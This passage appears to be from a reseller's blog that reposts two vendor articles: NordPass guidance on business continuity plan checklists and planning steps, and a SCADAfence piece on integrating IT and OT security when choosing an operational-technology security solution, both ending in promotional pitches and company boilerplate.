Testing procedures may include scenarios such as natural disasters, cyber-attacks, and other potential risks. The testing procedures should include clear objectives, testing scenarios, roles and responsibilities, and evaluation criteria to assess the effectiveness of the plan.
The Maintenance Procedures detail the steps necessary to keep the BCP up-to-date and relevant.
The Review and Update Procedures describe how the BCP will be reviewed and updated regularly to ensure its continued effectiveness. This may involve conducting a review of the plan on a regular basis or after significant changes to the organization’s operations or threats.
What should a business continuity plan checklist include?
Organizations looking to develop a BCP have more than a few things to think through and consider. Variables such as the size of the organization, its IT infrastructure, personnel, and resources all play a significant role in developing a continuity plan. Remember, each crisis is different, and each organization will have a view on handling it according to all the variables in play. However, all business continuity plans will include a few elements in one way or another.
Clearly defined areas of responsibility
A BCP should define specific roles and responsibilities for cases of emergency. Detail who is responsible for what tasks and clarify what course of action a person in a specific position should take. Clearly defined roles and responsibilities in an emergency event allow you to act quickly and decisively and minimize potential damage.
Crisis communication plan
In an emergency, communication is vital. It is the determining factor when it comes to crisis handling. For communication to be effective, it is critical to establish clear communication pipelines. Furthermore, it is crucial to understand that alternative communication channels should not be overlooked and outlined in a business continuity plan.
Recovery teams
A recovery team is a collective of different professionals who ensure that business operations are restored as soon as possible after the organization confronts a crisis.
Alternative site of operations
Today, when we think of an incident in a business environment, we usually think of something related to cybersecurity. However, as discussed earlier, a BCP covers many possible disasters. In a natural disaster, determine potential alternate sites where the company could continue to operate.
Backup power and data backups
Whether a cyber event or a real-life physical event, ensuring that you have access to power is crucial if you wish to continue operations. In a BCP, you can often come across lists of alternative power sources such as generators, where such tools are located, and who should oversee them. The same applies to data. Regularly scheduled data backups can significantly reduce potential losses incurred by a crisis event.
Recovery guidelines
If a crisis is significant, a comprehensive business continuity plan usually includes detailed guidelines on how the recovery process will be carried out.
Business continuity planning steps
Here are some general guidelines that an organization looking to develop a BCP should consider:
Analysis
A business continuity plan should include an in-depth analysis of everything that could negatively affect the overall organizational infrastructure and operations. Assessing different levels of risk should also be a part of the analysis phase.
Design and development
Once you have a clear overview of potential risks your company could face, start developing a plan. Create a draft and reassess it to see if it takes into account even the smallest of details.
Implementation
Implement BCP within the organization by providing training sessions for the staff to get familiar with the plan. Getting everyone on the same page regarding crisis management is critical.
Testing
Rigorously test the plan. Play out a variety of scenarios in training sessions to learn the overall effectiveness of the continuity plan. By doing so, everyone on the team will be closely familiar with the business continuity plan’s guidelines.
Maintenance and updating
Because the threat landscape constantly changes and evolves, you should regularly reassess your BCP and take steps to update it. By making your continuity plan in tune with the times, you will be able to stay a step ahead of a crisis.
Level up your company’s security with NordPass Business
A comprehensive business continuity plan is vital for the entire organization’s security posture. However, in a perfect world, you wouldn’t have to use it. This is where NordPass Business can help.
Remember, weak, reused, or compromised passwords are often cited as one of the top contributing factors in data breaches. It’s not surprising, considering that an average user has around 100 passwords. Password fatigue is real and significantly affects how people treat their credentials. NordPass Business counters these issues.
With NordPass Business, your team will have a single secure place to store all work-related passwords, credit cards, and other sensitive information. Accessing all the data stored in NordPass is quick and easy, which allows your employees not to be distracted by the task of finding the correct passwords for the correct account.
In cyber incidents, NordPass Business ensures that company credentials remain secure at all times. Everything stored in the NordPass vault is secured with advanced encryption algorithms, which would take hundreds of years to brute force.
If you are interested in learning more about NordPass Business and how it can fortify corporate security, do not hesitate to book a demo with our representative.
About Version 2
Version 2 is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.
About NordPass
NordPass is developed by Nord Security, a company leading the global market of cybersecurity products.
The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.
Securing Your Plant Without Shutting It Down: Navigating the Intersection of IT and OT
If one of your organization’s goals for 2023 is to implement a robust OT/ICS cyber security solution (and here’s why it absolutely should be, even if budgets are a little tight!) you may need a little help wading through the plethora of options, making a plan, and selling it to your CISO and board. There are many solutions being marketed out there, and many organizations willing to offer advice.
SCADAfence recently published a vendor-agnostic guide to choosing an OT Cyber Security solution that details why OT cyber security differs from IT cyber security and what you need to know to choose the solution that’s best for your organization. In this post, we’ll delve deeper and explore why a complete integration is so important.
The U.S. National Institute of Standards and Technology (NIST) also released a draft version of a detailed technical guide to implementing OT security, with the final edition expected later this year. We suggest you download and read that as well.
One important thing to remember is that even if you don’t have a complete OT security solution at the moment, you still are probably not starting from scratch.
Enter the so-called expert from IT.
Integration Between OT and IT Is Essential
As we discovered recently on reddit, every control system engineer has a horror story to share about an IT guy who showed up on the floor of the manufacturing facility with a poorly thought out plan to install or upgrade or a cyber security solution. They proceed to scan every device on the OT network with a tool not-quite designed for the job and leave a disaster in their wake. Machines shut down. Production lines halted. Productivity out the window. Fingers pointed directly at the OT engineers.
We understand why most OT engineers would prefer to keep IT experts out of the factory, and back in the office, where they belong. But the fact is, OT networks require cyber security protection too. (And because a cyber attack in the OT world risks harming physical safety, not just data, the need is actually higher.)
However, as the integration of IT and OT systems becomes increasingly connected in functionality, it’s important to ensure that their cyber security solutions are well-integrated as well.
IT systems are usually more mature, based on common operating systems such as Windows OS or Linux, and have more options available. OT systems on the other hand, are often more fragile and built on custom software, but are more critical to an organization’s mission.
Therefore, as much as the OT teams might prefer to keep the IT teams out of their workspace, it is important for them to work together. Make sure roles and responsibilities are well-defined and it’s clear who holds final accountability for making sure your facility is secure.
Identify Your Specific Use Case
Before selecting an OT cyber security vendor, it’s essential to prepare and validate a clear list of IT integration use cases, and ensure that your chosen vendor is able to meet those needs
A sound and complete integration between OT and IT security solutions should accomplish several things. First, it should allow for the flow of information between the two systems. This means that the OT team can receive alerts and notifications from the IT system, and vice versa. Second, a seamless integration should allow for forensic analysis to be conducted across both systems if needed. Third, remote users that are authenticated by the IT systems, may need access to OT systems as well. Therefore, a proper solution will allow a way for users logging on remotely to get the access they need at the correct level of authorization.
This means that the solution should integrate seamlessly with other tools that are already in place. For example, SCADAfence integrates with a number of different security vendors, such as Rapid7, Keysight, and Secureworks. An open API that allows for maximum flexibility is ideal, as it allows you to tailor the integration to your specific use case rather than being limited to pre-set integrations that may not meet your needs.
Increased Visibility And Other OT Needs
In addition to the OT/IT integration, there are many other things to look for in an OT solution. Including, yes, the ability to passively scan the network to create a detailed inventory of every device without causing damage and shutting down the network. Other must-haves include quick installation time, low false positive rates, and tailored risk alerts. These are all covered in detail in the guide as well.
So, when the CISO, IT person or other member of senior management tells you they want to bring in a cyber security expert, instead of tossing them out on their head and bolting the door, invite them in, be prepared, and talk about how best to work together.
To get more advice and information about choosing an OT cyber security solution, download our complementary guide.
About Version 2
Version 2 is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.
About SCADAfence
SCADAfence helps companies with large-scale operational technology (OT) networks embrace the benefits of industrial IoT by reducing cyber risks and mitigating operational threats. Our non-intrusive platform provides full coverage of large-scale networks, offering best-in-class detection accuracy, asset discovery and user experience. The platform seamlessly integrates OT security within existing security operations, bridging the IT/OT convergence gap. SCADAfence secures OT networks in manufacturing, building management and critical infrastructure industries. We deliver security and visibility for some of world’s most complex OT networks, including Europe’s largest manufacturing facility. With SCADAfence, companies can operate securely, reliably and efficiently as they go through the digital transformation journey.
